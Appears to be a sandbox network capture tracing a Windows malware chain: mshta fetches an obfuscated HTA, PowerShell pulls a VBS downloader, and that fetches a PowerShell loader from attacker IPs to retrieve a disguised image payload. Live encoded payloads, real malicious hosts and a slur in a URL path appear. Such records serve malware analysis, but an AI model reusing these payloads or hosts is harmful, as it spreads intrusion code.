                        Data Ascii: <Script Language='Javascript'>...document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%4A%61%76%61%53%63%72%69%70%74%3E%6D%3D%27%25%33%43%25%32%31%44%4F%43%54%59%50%45%25%32%30%68%74%6D%6C%25%33%45%25%30%41%25%33%43%6D%65%74%61%25%32%30%68%74%74%70%2D%65%71%75%69%76%25%33%44%25%32%32%58%2D%55%41%2D%43%6F%6D%70%61%74%69%62%6C%65%25%32%32%25%32%30%63%6F%6E%74%65%6E%74%25%33%44%25%32%32%49%45%25%33%44%45%6D%75%6C%61%74%65%49%45%38%25%32%32%25%32%30%25%33%45%25%30%41%25%33%43%68%74%6D%6C%25%33%45%25%30%41%25%33%43%62%6F%64%79%25%33%45%25%30%41%25%33%43%73%63%72%69%70%54%25%32%30%74%79%50%65%25%33%44%25%32%32%74%45%58%74%2F%76%42%73%43%72%69%70%74%25%32%32%25%33%45%25%30%41%44%49%6D%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%
                        Jul 3, 2024 18:03:27.269356012 CEST1236INData Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32
                        Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%
                        Jul 3, 2024 18:03:27.269366980 CEST1236INData Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                        Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%
                        Jul 3, 2024 18:03:27.269629955 CEST672INData Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                        Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%
                        Jul 3, 2024 18:03:27.269640923 CEST1236INData Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32
                        Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%
                        Jul 3, 2024 18:03:27.269646883 CEST1236INData Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                        Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%
                        Jul 3, 2024 18:03:27.269651890 CEST1236INData Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                        Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%
                        Jul 3, 2024 18:03:27.269771099 CEST1236INData Raw: 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33
                        Data Ascii: 30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%
                        Jul 3, 2024 18:03:27.269788027 CEST1236INData Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32
                        Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%
                        Jul 3, 2024 18:03:27.269798040 CEST1236INData Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                        Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%
                        Jul 3, 2024 18:03:27.276217937 CEST1236INData Raw: 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33
                        Data Ascii: 30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.2249167192.185.89.92801100C:\Windows\System32\mshta.exe
                        TimestampBytes transferredDirectionData
                        Jul 3, 2024 18:03:27.916109085 CEST343OUTGET /ppltL HTTP/1.1
                        Accept: */*
                        Accept-Language: en-US
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: hop.fyi
                        Connection: Keep-Alive
                        Jul 3, 2024 18:03:28.485985994 CEST627INHTTP/1.1 301 Moved Permanently
                        Date: Wed, 03 Jul 2024 16:03:28 GMT
                        Server: Apache
                        Cache-Control: no-cache, no-store, private
                        Expires: -1
                        Upgrade: h2,h2c
                        Connection: Upgrade, Keep-Alive
                        Location: http://198.46.178.144/EvengIEcache.hta
                        Vary: Accept-Encoding
                        Content-Encoding: gzip
                        Access-Control-Allow-Origin: *
                        Content-Length: 212
                        Keep-Alive: timeout=5, max=75
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 90 c1 0e 82 30 0c 86 ef 3e c5 dc c5 13 9b 24 44 51 07 17 c5 c4 93 c6 e0 c1 e3 1c 95 91 20 e8 28 26 be bd 93 99 90 70 a2 97 b6 49 fb f7 ff 2a a6 bb e3 36 bd 9e 12 a2 f1 51 c6 13 e1 12 b1 21 34 c8 cc 95 5d fb 00 94 44 69 69 1a c0 88 5e d2 bd 17 52 c2 87 03 1a f1 e9 c1 ab 2d de 11 35 70 37 d0 68 4a 54 5d 21 54 76 6b be 69 4d 19 cd 7e 43 6b ce fd 55 c8 82 05 f3 97 21 f3 83 80 27 6f a8 f2 43 a2 a4 d2 c0 34 ca 59 27 df eb 63 81 25 c4 67 c8 0a 03 0a 8b 2a 27 58 93 71 52 82 bb 65 07 c6 7b 32 71 ab b3 4f cf 30 10 17 96 c7 42 44 74 dc 15 1a 8f 75 23 63 f6 b7 e2 ee 5b 4b bf bf 7f 01 56 57 01 9f 8e 01 00 00
                        Data Ascii: 0>$DQ (&pI*6Q!4]Dii^R-5p7hJT]!TvkiM~CkU!'oC4Y'c%g*'XqRe{2qO0BDtu#c[KVW


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.2249168198.46.178.144801100C:\Windows\System32\mshta.exe
                        TimestampBytes transferredDirectionData
                        Jul 3, 2024 18:03:28.517102957 CEST411OUTGET /EvengIEcache.hta HTTP/1.1
                        Accept: */*
                        Accept-Language: en-US
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Range: bytes=8983-
                        Connection: Keep-Alive
                        Host: 198.46.178.144
                        If-Range: "d0282dd4eccda1:0"
                        Jul 3, 2024 18:03:29.002759933 CEST1236INHTTP/1.1 206 Partial Content
                        Content-Type: application/hta
                        Last-Modified: Tue, 02 Jul 2024 07:10:04 GMT
                        Accept-Ranges: bytes
                        ETag: "d0282dd4eccda1:0"
                        Server: Microsoft-IIS/10.0
                        Date: Wed, 03 Jul 2024 16:03:28 GMT
                        Content-Length: 96750
                        Content-Range: bytes 8983-105732/105733
                        Data Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 [TRUNCATED]
                        Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
                        Jul 3, 2024 18:03:29.002778053 CEST224INData Raw: 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25
                        Data Ascii: %30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%53%45%74%25%32%30%25%32%30%25%32%30%25%3
                        Jul 3, 2024 18:03:29.002787113 CEST1236INData Raw: 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32
                        Data Ascii: 2%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%3
                        Jul 3, 2024 18:03:29.002794027 CEST1236INData Raw: 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30
                        Data Ascii: 0%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%3
                        Jul 3, 2024 18:03:29.002799034 CEST1236INData Raw: 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30
                        Data Ascii: 0%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%3
                        Jul 3, 2024 18:03:29.002809048 CEST672INData Raw: 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 33 25 34 34 25 32 35 25 33 32 25 33 30 25 32 35
                        Data Ascii: 5%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%33%44%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%2
                        Jul 3, 2024 18:03:29.002962112 CEST1236INData Raw: 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30
                        Data Ascii: 0%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%3
                        Jul 3, 2024 18:03:29.002973080 CEST1116INData Raw: 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35
                        Data Ascii: 5%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%2
                        Jul 3, 2024 18:03:29.002984047 CEST1236INData Raw: 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35
                        Data Ascii: 5%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%2
                        Jul 3, 2024 18:03:29.002995968 CEST1236INData Raw: 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32
                        Data Ascii: 2%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%3
                        Jul 3, 2024 18:03:29.007767916 CEST1236INData Raw: 35 25 33 37 25 32 35 25 33 32 25 33 39 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32
                        Data Ascii: 5%37%25%32%39%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%3


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.2249169198.46.178.144802988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Jul 3, 2024 18:03:35.350399971 CEST347OUTGET /eveningfiledatinglover.vbs HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 198.46.178.144
                        Connection: Keep-Alive
                        Jul 3, 2024 18:03:35.841720104 CEST1236INHTTP/1.1 200 OK
                        Content-Type: text/vbscript
                        Last-Modified: Wed, 03 Jul 2024 13:44:02 GMT
                        Accept-Ranges: bytes
                        ETag: "58caf104fcdda1:0"
                        Server: Microsoft-IIS/10.0
                        Date: Wed, 03 Jul 2024 16:03:35 GMT
                        Content-Length: 3496
                        Data Raw: ff fe 44 00 69 00 6d 00 20 00 63 00 7a 00 78 00 52 00 4f 00 75 00 4c 00 68 00 4b 00 55 00 63 00 47 00 61 00 65 00 63 00 65 00 6f 00 65 00 6d 00 4b 00 42 00 4e 00 71 00 65 00 6b 00 70 00 4c 00 51 00 42 00 57 00 4f 00 70 00 41 00 6d 00 69 00 69 00 5a 00 61 00 70 00 43 00 69 00 73 00 62 00 4b 00 51 00 6d 00 4c 00 4c 00 4c 00 57 00 6e 00 75 00 6c 00 57 00 70 00 7a 00 61 00 47 00 6b 00 66 00 69 00 62 00 6e 00 47 00 43 00 49 00 57 00 70 00 4c 00 54 00 64 00 4b 00 6d 00 47 00 7a 00 68 00 50 00 75 00 65 00 41 00 71 00 6c 00 53 00 4b 00 63 00 4a 00 49 00 41 00 70 00 4b 00 78 00 6e 00 63 00 65 00 6b 00 4a 00 50 00 4f 00 55 00 75 00 2c 00 20 00 50 00 41 00 6d 00 4b 00 50 00 74 00 76 00 68 00 65 00 52 00 6f 00 57 00 6d 00 64 00 53 00 66 00 66 00 63 00 6b 00 6c 00 69 00 4f 00 6d 00 4f 00 6b 00 41 00 68 00 66 00 57 00 4e 00 65 00 73 00 6f 00 4f 00 41 00 7a 00 57 00 63 00 6f 00 6d 00 5a 00 6e 00 62 00 4c 00 63 00 6e 00 70 00 61 00 66 00 69 00 4b 00 4c 00 4c 00 47 00 4e 00 57 00 55 00 47 00 41 00 61 00 70 00 54 00 [TRUNCATED]
                        Data Ascii: Dim czxROuLhKUcGaeceoemKBNqekpLQBWOpAmiiZapCisbKQmLLLWnulWpzaGkfibnGCIWpLTdKmGzhPueAqlSKcJIApKxncekJPOUu, PAmKPtvheRoWmdSffckliOmOkAhfWNesoOAzWcomZnbLcnpafiKLLGNWUGAapTGRdiKGopGONsKZAfjcWnLSRCaPiKheQIecAxzfSet czxROuLhKUcGaeceoemKBNqekpLQBWOpAmiiZapCisbKQmLLLWnulWpzaGkfibnGCIWpLTdKmGzhPueAqlSKcJIApKxncekJPOUu = CreateObject("MSXML2.ServerXMLHTTP")czxROuLhKUcGaeceoemKBNqekpLQBWOpAmiiZapCisbKQmLLLWnulWpzaGkfibnGCIWpLTdKmGzhPueAqlSKcJIApKxncekJPOUu.Open "GET", "http://94.156.65.247/Users_API/negro
                        Jul 3, 2024 18:03:35.841739893 CEST1236INData Raw: 00 63 00 6f 00 63 00 6b 00 2f 00 66 00 69 00 6c 00 65 00 5f 00 6d 00 71 00 35 00 75 00 70 00 70 00 6e 00 61 00 2e 00 6c 00 64 00 74 00 2e 00 74 00 78 00 74 00 22 00 2c 00 20 00 46 00 61 00 6c 00 73 00 65 00 0d 00 0a 00 63 00 7a 00 78 00 52 00 4f
                        Data Ascii: cock/file_mq5uppna.ldt.txt", FalseczxROuLhKUcGaeceoemKBNqekpLQBWOpAmiiZapCisbKQmLLLWnulWpzaGkfibnGCIWpLTdKmGzhPueAqlSKc
                        Jul 3, 2024 18:03:35.841749907 CEST1236INData Raw: 00 4b 00 4c 00 4f 00 4c 00 69 00 52 00 74 00 57 00 66 00 5a 00 43 00 6d 00 55 00 63 00 57 00 4c 00 49 00 6e 00 63 00 57 00 51 00 69 00 70 00 4f 00 75 00 4c 00 6e 00 69 00 57 00 63 00 67 00 4b 00 4c 00 55 00 69 00 71 00 4c 00 64 00 41 00 73 00 4c
                        Data Ascii: KLOLiRtWfZCmUcWLIncWQipOuLniWcgKLUiqLdAsLtSbKUifpfRiaPcehQZLGLKglRUaBkKloLpicaOGNfBZNOcC = CreateObject("WScript.Shell")
                        Jul 3, 2024 18:03:35.841761112 CEST17INData Raw: 00 6f 00 74 00 68 00 69 00 6e 00 67 00 0d 00 0a 00
                        Data Ascii: othing


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.224917094.156.65.247803264C:\Windows\System32\wscript.exe
                        TimestampBytes transferredDirectionData
                        Jul 3, 2024 18:03:39.119570971 CEST212OUTGET /Users_API/negrocock/file_mq5uppna.ldt.txt HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        Accept-Language: en-US
                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                        Host: 94.156.65.247
                        Jul 3, 2024 18:03:39.758742094 CEST1236INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 16:03:39 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Wed, 03 Jul 2024 13:44:03 GMT
                        ETag: "55d-61c5806010301"
                        Accept-Ranges: bytes
                        Content-Length: 1373
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/plain
                        Data Raw: ef bb bf 28 28 27 59 30 75 6c 69 6e 6b 20 3d 20 78 52 27 2b 27 6d 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 35 34 2e 31 39 34 2f 69 6d 67 65 2f 6e 65 77 2d 69 6d 61 67 65 5f 76 2e 6a 70 67 27 2b 27 78 52 6d 3b 20 59 30 75 77 65 62 43 27 2b 27 6c 69 65 6e 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 3b 20 74 72 79 20 7b 20 59 30 75 64 6f 77 6e 6c 6f 27 2b 27 61 64 65 64 44 61 74 61 20 27 2b 27 3d 20 59 30 75 77 65 62 43 6c 69 65 6e 74 2e 44 6f 77 6e 6c 6f 61 64 44 27 2b 27 61 74 61 28 59 30 75 6c 69 6e 6b 29 20 7d 20 63 61 74 63 68 20 7b 20 57 72 69 74 65 2d 27 2b 27 48 6f 73 74 20 78 52 6d 46 61 69 6c 65 64 20 54 6f 20 64 6f 77 6e 6c 6f 61 64 20 64 61 74 61 20 66 72 6f 6d 20 59 30 75 6c 69 6e 6b 78 52 6d 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 27 2b 27 6f 6c 6f 72 20 52 65 64 3b 20 65 78 69 74 20 7d 3b 20 69 66 20 28 59 30 75 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 2d 6e 65 20 59 30 75 6e 75 6c 6c 29 20 7b 20 59 30 75 69 6d 61 27 2b 27 [TRUNCATED]
